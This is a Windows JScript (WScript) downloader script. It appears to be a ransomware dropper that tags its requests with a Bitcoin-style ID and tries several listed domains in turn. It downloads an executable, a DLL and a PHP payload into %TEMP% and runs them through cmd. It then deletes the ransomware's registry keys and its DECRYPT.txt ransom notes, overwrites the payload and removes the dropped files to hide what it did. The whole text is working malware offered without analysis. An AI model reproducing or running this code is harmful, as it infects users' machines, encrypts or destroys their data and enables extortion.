var ad = "1GvBs6wNH6R9kmLDYJmMsQNryni4ZVzy3P";var ld = 0;var cq = String.fro

1. var ad = "1GvBs6wNH6R9kmLDYJmMsQNryni4ZVzy3P";
2. var ld = 0;
3. var cq = String.fromCharCode(34);
4. var cs = String.fromCharCode(92);
5. var ll = "szallas-utazas-wellness.hu tsvetodom.ru zexum.com tbmcompany.com stroydek.ru".split(" ");
6. var ws = WScript.CreateObject("WScript.Shell");
7. var fn = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "a";
8. var pd = ws.ExpandEnvironmentStrings("%TEMP%") + cs + "php4ts.dll";
9. var xo = WScript.CreateObject("MSXML2.XMLHTTP");
10. var xa = WScript.CreateObject("ADODB.Stream");
11. var fo = WScript.CreateObject("Scripting.FileSystemObject");
12. for (var n = 3; n <= 5; n++) {
13. for (var i = ld; i < ll.length; i++) {
14. var dn = 0;
15. try {
16. xo.open("GET", "http://" + ll[i] + "/counter/?ad=" + ad + "&rnd=" + i + n, false);
17. xo.send();
18. if (xo.status == 200) {
19. xa.open();
20. xa.type = 1;
21. xa.write(xo.responseBody);
22. if (xa.size > 1000) {
23. dn = 1;
24. if (n == 3) {
25. xa.saveToFile(fn + ".exe", 2);
26. } else if (n == 4) {
27. xa.saveToFile(pd, 2);
28. } else if (n == 5) {
29. xa.saveToFile(fn + ".php", 2);
30. };
31. };
32. xa.close();
33. };
34. if (dn == 1) {
35. ld = i;
36. break;
37. };
38. } catch (er) {};
39. };
40. };
41. if (fo.FileExists(fn + ".exe") && fo.FileExists(pd) && fo.FileExists(fn + ".php")) {
42. ws.Run("%COMSPEC% /c " + fn + ".exe " + cq + fn + ".php" + cq, 1, 1);
43. ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCU" + cs + "SOFTWARE" + cs + "Microsoft" + cs + "Windows" + cs + "CurrentVersion" + cs + "Run" + cq + " /V " + cq + "Crypted" + cq + " /F", 0, 0);
44. ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCR" + cs + ".crypted" + cq + " /F", 0, 0);
45. ws.Run("%COMSPEC% /c REG DELETE " + cq + "HKCR" + cs + "Crypted" + cq + " /F", 0, 0);
46. ws.Run("%COMSPEC% /c del " + cq + "%AppData%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
47. ws.Run("%COMSPEC% /c del " + cq + "%UserProfile%" + cs + "Desktop" + cs + "DECRYPT.txt" + cq, 0, 0);
48. var fp = fo.CreateTextFile(fn + ".php", true);
49. for (var i = 0; i < 1000; i++) {
50. fp.WriteLine(ad);
51. };
52. fp.Close();
53. ws.Run("%COMSPEC% /c DEL " + cq + fn + ".php" + cq, 0, 0);
54. ws.Run("%COMSPEC% /c DEL " + cq + fn + ".exe" + cq, 0, 0);
55. ws.Run("%COMSPEC% /c DEL " + cq + pd + cq, 0, 0);
56. };